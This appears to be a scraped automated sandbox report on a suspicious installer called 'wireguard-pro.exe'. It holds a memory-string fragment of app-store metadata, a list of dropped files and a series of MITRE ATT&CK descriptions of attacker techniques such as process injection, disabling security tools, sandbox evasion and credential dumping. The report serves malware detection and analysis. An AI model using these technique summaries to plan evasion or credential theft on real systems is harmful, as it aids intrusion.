Source: svchost.exe, 0000001C.00000003.798242335.000002034AD95000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: t enough.\r\n\r\nSHARE WITH FRIENDS\r\nSend photos and videos to keep your close friends up to speed. Receive files for even more productivity.\r\n\r\n\r\nCalls are free over Wi-Fi but otherwise standard data charges apply.\r\nPrivacy Policy: https://www.facebook.com/about/privacy \| LEARN MORE at: https://messenger.com (https://messenger.com/)","ProductTitle":"Messenger","SearchTitles":[],"Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"MarketProperties":[{"RelatedProducts":[],"Markets":["US"]}],"ProductASchema":"Product;3","ProductBSchema":"ProductUnifiedApp;3","ProductId":"9WZDNCRF0083","Properties":{"PackageFamilyName":"Facebook.317180B0BB486_8xx8rvfyw5nnt","PackageIdentityName":"FACEBOOK.317180B0BB486","PublisherCertificateName":"CN=6E08453F-9BA7-4311-999C-D22FBA2FB1B8","XboxCrossGenSetId":null,"XboxConsoleGenOptimized":null,"XboxConsoleGenCompatible":null},"AlternateIds":[{"IdType":"LegacyWindowsStoreProductId","Value":"c6a9fa5c-20a2-4e12-904d-edd408657dc8"},{"IdType":"LegacyWindowsPhoneProductId","Value":"3219d30d-4a23-4f58-a91c-c44b04e6a0c7"},{"IdType":"XboxTitleId","Value":"2004208728"}],"IngestionSource":"DCE","IsMicrosoftProduct":false,"PreferredSkuId":"0010","ProductType":"Application","ValidationData":{"PassedValidation":false,"RevisionId":"2023-09-26T19:35:25.6085288Z\|\|.\|\|d4ee6f1b-8b08-4e5e-a5f7-e1f96ec7fa97\|\|1152921505696822571\|\|Null\|\|fullrelease","ValidationResultUri":""},"MerchandizingTags":[],"PartD":"","ProductFamily":"Apps","ProductKind":"Application","DisplaySkuAvailabilities":[{"Sku":{"LastModifiedDate":"2023-09-26T19:35:02.9056134Z","LocalizedProperties":[{"SkuDescription":"Made for big screens and close connections. Get access to free texting, and high-quality voice & video chat built specifically for desktop.\r\n\r\nMADE FOR DESKTOP, MADE

Description:	Adversaries may move onto systems, possibly those on disconnected or air-gapped networks, by copying malware to removable media and taking advantage of Autorun features when the media is inserted into a system and executes. In the case of Lateral Movement, this may occur through modification of executable files stored on removable media or by copying malware and renaming it to look like a legitimate file to trick users into executing it on a separate system. In the case of Initial Access, this may occur through manual manipulation of the media, modification of systems used to initially format the media, or modification to the media's firmware itself.
Tactics:	Initial Access, Lateral Movement
Data Sources:	Data loss prevention, File monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to achieve execution. WMI is a Windows administration feature that provides a uniform environment for local and remote access to Windows system components. It relies on the WMI service for local and remote access and the server message block (SMB) and Remote Procedure Call Service (RPCS) for remote access. RPCS operates over port 135.
Tactics:	Execution
Data Sources:	Authentication logs, Netflow/Enclave netflow, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by hijacking the library manifest used to load DLLs. Adversaries may take advantage of vague references in the library manifest of a program by replacing a legitimate library with a malicious one, causing the operating system to load their malicious library when it is called for by the victim program.
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	Loaded DLLs, Process monitoring, Process use of network
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may create or modify Windows services to repeatedly execute malicious payloads as part of persistence. When Windows boots up, it starts programs or applications called services that perform background system functions.Windows service configuration information, including the file path to the service's executable or recovery programs/commands, is stored in the Windows Registry. Service configurations can be modified using utilities such as sc.exe and Reg .
Tactics:	Persistence, Privilege Escalation
Data Sources:	API monitoring, File monitoring, Process command-line parameters, Process monitoring, Windows Registry, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in. These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	File monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security tools scanning or reporting information.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Services, Windows Registry
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify file time attributes to hide new or changes to existing files. Timestomping is a technique that modifies the timestamps of a file (the modify, access, create, and change times), often to mimic files that are in the same folder. This is done, for example, on files that have been modified or created by the adversary so that they do not appear conspicuous to forensic investigators or file analysis tools.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report wireguard-pro.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Yara Signatures

Dropped Files

Memory Dumps

Unpacked PEs

Sigma Signatures

Snort Signatures

Joe Sandbox Signatures

AV Detection

Exploits

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

E-Banking Fraud

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Config.Msi\51c701.rbs

C:\Config.Msi\51c703.rbs

C:\Program Files\WireGuard\Data\log.bin

C:\Program Files\WireGuard\wg.exe

C:\Program Files\WireGuard\wireguard.exe

C:\ProgramData\Microsoft\Windows\Start Menu\Programs\WireGuard.lnk

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\026A86A161D256DBB33076EDF20C0E5E_8372263305412A8ACAD18CE348CFB7C8

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\026A86A161D256DBB33076EDF20C0E5E_86AB612B21DEDF3B8CD155ED2E4114FF

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\A37B8BA80004D3266CB4D93B2052DC10_EBDB5A7037F08CDFB408DBFC0D44B43D

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\A9B13BCD41ACB49316A37129BE941FFA_BD22E51CB23A085126973E3A7E539978

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\AF360AACB1570042DEFBC833317997D0_6D40F27EBCB4D57A7D8447DAAC4FFE30

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\026A86A161D256DBB33076EDF20C0E5E_8372263305412A8ACAD18CE348CFB7C8

Windows Analysis Report
wireguard-pro.exe

Description:	Adversaries may delete files left behind by the actions of their intrusion activity. Malware, tools, or other non-native files dropped or created on a system by an adversary may leave traces to indicate to what was done within a network and how. Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may set files and directories to be hidden to evade detection mechanisms. To prevent normal users from accidentally changing special files on a system, most operating systems have the concept of a ‘hidden’ file. These files don’t show up when a user browses the file system with a GUI or when using normal commands on the command line. Users must explicitly ask to show the hidden files either via a series of Graphical User Interface (GUI) prompts or with command line switches ( `dir /a` for Windows and `ls –a` for Linux and macOS).
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	API monitoring, PowerShell logs, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	API monitoring, Binary file metadata, DLL monitoring, Kernel drivers, Loaded DLLs, PowerShell logs, Process command-line parameters, Process monitoring, User interface, Windows Registry, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search the Registry on compromised systems for insecurely stored credentials. The Windows Registry stores configuration information that can be used by the system or other programs. Adversaries may query the Registry looking for credentials and passwords that have been stored for use by other programs or services. Sometimes these credentials are used for automatic logons.
Tactics:	Credential Access
Data Sources:	Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local file systems and remote file shares for files containing insecurely stored credentials. These can be files created by users to store their own credentials, shared credential stores for a group of individuals, configuration files containing passwords for a system or service, or source code/binary files containing embedded passwords.
Tactics:	Credential Access
Data Sources:	File monitoring, Process command-line parameters
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to gather information about attached peripheral devices and components connected to a computer system. Peripheral devices could include auxiliary resources that support a variety of functionalities such as keyboards, printers, cameras, smart card readers, or removable storage. The information may be used to enhance their awareness of the system and network environment or may be used for further actions.
Tactics:	Discovery
Data Sources:	API monitoring, PowerShell logs, Process command-line parameters, Process monitoring
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of accounts on a system or within an environment. This information can help adversaries determine which accounts exist to aid in follow-on behavior.
Tactics:	Discovery
Data Sources:	API monitoring, Azure activity logs, Office 365 account logs, Process command-line parameters, Process monitoring
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre